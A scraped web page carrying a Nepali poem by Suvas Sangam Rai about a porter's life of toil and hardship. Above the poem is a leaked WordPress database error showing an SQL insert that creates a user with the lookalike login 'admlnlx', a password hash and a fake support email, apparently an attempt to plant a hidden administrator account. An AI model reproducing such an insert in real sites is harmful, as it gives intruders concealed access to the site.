WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ71SdRiVP56UO2hU/UaQimO1pipyE/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 09:00:14', '', 'admlnlx', 'admlnlx')
सुवास संगम राई
भरियाको भूगोल भन्नु, पसिनाले सिञ्चिएको
जति भोग्यो उस्तै जीवन, दु:खले नै रचिएको
फेरि पनि डोर्याउनै छ
एउटा सुन्दर भविस्य जो
जिन्दगीको अर्थहरु, खोज्दा खोज्दै ढाकरमा
भेट्नै गाह्रो बरु जीवन, पुग्ला कहीँ किनारमा
जसोगर्यो मुस्कान त, अभावमै छ अल्झिएको
जति भोग्यो उस्तै जीवन, दु:खले नै रचिएको
थाप्लो माथी रहर बोक्दै, टेकुवाको सहारामा
हिँड्न खोज्यो बाटोहरु, रोकिन्छ जो पहारामा
भोग्नु कति रित्तो समय, घाउ उस्तै बल्झिएको
जति भोग्यो उस्तै जीवन, दु:खले नै रचिएको ।